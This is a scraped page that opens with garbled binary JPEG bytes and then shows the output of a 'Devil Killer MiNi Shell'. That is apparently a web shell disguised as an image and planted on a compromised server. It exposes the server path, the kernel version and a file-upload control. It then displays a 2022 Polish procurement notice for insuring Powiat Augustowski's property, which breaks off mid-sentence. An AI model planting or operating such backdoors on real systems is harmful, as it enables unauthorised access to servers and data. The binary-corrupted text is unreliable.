JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220513/0015820301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ubezpieczenie majątku i innych interesów Powiatu Augustowskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT AUGUSTOWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790670906</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 3 Maja 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">876439650</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">876439695</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">powiat.augustowski@home.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">augustowski.home.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - Starostwo Powiatowe</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">8461424162</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3 Maja 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">876439650</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">876439695</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">powiat.augustowski@home.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.augustowski.home.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">3</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - Powiatowy Zarząd Dróg</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">846-14-28-349</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 54</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 643 49 20</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 54 54</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@st.augustow.wrotapodlasia.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip-pzd-staugustow.wrotapodlasia.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">4</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Urząd Pracy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">846-10-15-245</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mickiewicza 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 644 49 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 58 03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pup.augustow.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://augustow.praca.gov.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">5</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - Poradnia Psychologiczno-Pedagogiczna w Augustowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">8461042058</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Młyńska 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 643 36 21</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 36 21</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ppp-p_augustow@wp.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://poradniap-p.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">6</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - Powiatowe Centrum Pomocy Rodzinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">846-14-30-725</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Młyńska 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 643 20 71</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 20</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pcpr@st.augustow.wrotapodlasia.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.pcpr.st.augustow.wrotapodlasia.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">7</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - II liceum Ogólnokształcące im. Polonii i Polaków na Świecie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">846-10-56-563</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Kardynała Wyszyńskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 643 22 28</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 22 28</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">2lo@st.augustow.wrotapodlasia.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.lo2.augustow.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">8</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - Zespół Szkół Ogólnokształcących</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">8461056942</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Śródmieście 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 643 24 02</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 24 02</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zso@st.augustow.wrotapodlasia.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://piramowicz.augustow.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">9</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - Zespół Szkół Technicznych im. Gen. I. Prądzyńskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">846-105-65-28</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tytoniowa 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 643 28 29</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 28 29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zst.augustow.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zst.augustow.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">10</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - Zespół Szkół Specjalnych w Augustowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">846-14-87-323</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Kardynała Wyszyńskiego 3B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 644 76 82</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 644 76 82</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zss@st.augustow.wrotapodlasia.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://zssaugustow.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">11</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - Zespół Placówek Młodzieżowych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">8461605283</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Kard. Wyszyńskiego 3A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 643 25 40</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 03 97</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zpm@st.augustow.wrotapodlasia.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zpm-augustow.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">12</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Augustowski - Augustowskie Centrum Edukacyjne</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">846-10-50-980</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Kard. Wyszyńskiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">876432861</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">876432861 wew. 34</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ace@acedu.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.acedu.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">13</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Augustowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">8461375707</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 644 42 84</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 34 19</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@spzoz.augustow.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spzoz.augustow.pl</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">Na posiedzeniu Zarządu Powiatu dniu 9 marca 2022 r. zapadła decyzja w sprawie przeprowadzenia postępowania i udzielenia zamówienia publicznego na ubezpieczenie majątku i innych interesów Powiatu Augustowskiego na lata 2022-2024 do przeprowadzenia postępowania i udzielenia zamówienia publicznego wyznaczone zostało Starostwo Powiatowe w Augustowie.</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ubezpieczenie majątku i innych interesów Powiatu Augustowskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b49a0e30-d1ba-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00158203</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033928/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ubezpieczenie majatku i innych interesów Powiatu Augustowskiego z podziałaem na częśći I, II, III</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b49a0e30-d1ba-11ec-9a86-f6f4c648a056 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest z użyciem środków komunikacji elektronicznej przy użyciu miniPortalu - https//miniportal.uzp.gov.pl/, ePUAPu - Adres Elektronicznej Skrzynki Podawczej na e-PUAP:/StarostwoPowiatoweAugustow/SkrytkaESP lub<br/>/StarostwoPowiatoweAugustow/skrytka oraz przy użyciu poczty elektronicznej - email:powiat.augustowski@home.pl <br/>Adres strony internetowej Zamawiającego <br/>www.augustowski.home.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: &#34;Formularz do złożenia, zmiany, wycofania oferty lub wniosku&#34; oraz do &#34; Formularza do komunikacji&#34;. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Maksymalny rozmiar plików przesłanych za pośrednictwem dedykowanych formularzy: <br/>&#34;Formularz złożenia, zmiany, wycofania oferty lub wniosku&#34; i &#34;Formularza do komunikacji&#34; wynosi 150 MB. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję &#34;Dla Wykonawców&#34; lub ze strony głównej z zakładki Postępowania. Wykonawca składa ofertę w postępowaniu za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty&#34; dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem. Sposób złozenia oferty, w tym zaszyfrowania oferty opisany został w &#34;Instrukcji Użytkownika&#34;, dostępnej na stronie: https://miniportal.uzp.gov.pl Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w 